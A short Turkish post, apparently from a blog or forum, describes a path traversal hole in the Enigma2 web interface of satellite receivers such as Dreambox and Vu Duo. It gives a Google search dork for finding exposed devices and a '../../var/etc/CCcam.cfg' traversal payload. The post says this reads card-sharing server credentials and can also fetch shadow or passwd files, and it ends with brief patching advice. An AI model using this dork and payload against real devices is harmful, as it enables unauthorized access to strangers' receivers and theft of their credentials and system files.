Dreambox,vu duo,atalanta hd box vs.. bir çok uydu alıcısı bu alt yapıyı kullanarak kart paylaşımı yapıyor.Cihazlardaki açık nedeniyle kart paylaşımı yapılan şifreler ve server şifreleri rahatlıkla ele geçiriliyor.Bununla ilgili açığın kullanımı ve kapatılmasını sizlere göstericem ben kendi evimdeki cihazımda bu şekilde elde ettiğim bir serverı test ettim ve sildim.Eğer cihazlarınızda bu alt yapı varsa mutlaka guncelleme yada kapatma işlemi yapınız.
Google Arama Kodu : "Enigma2 movielist" filetype:rss
Açığın kullanımı
Arama kodunda çıkan sitelerin sonuna file?file=../../../../../../../../../../../../../var/etc/CCcam.cfg bu kodu eklediğiniz takdirde cihazın kullandığı kart paylaşımlı server bilgisine ulaşılıyor.İsterseniz shadow yada passwd dosyalarıda indirilebiliyor.
Açığı kapatmak için cihazın web arayüzünden güncelleme yapılması gerekmektedir veya Tv kumandası ile yazılım guncellemesi yapılarak bu açıktan kurtulabilirsiniz.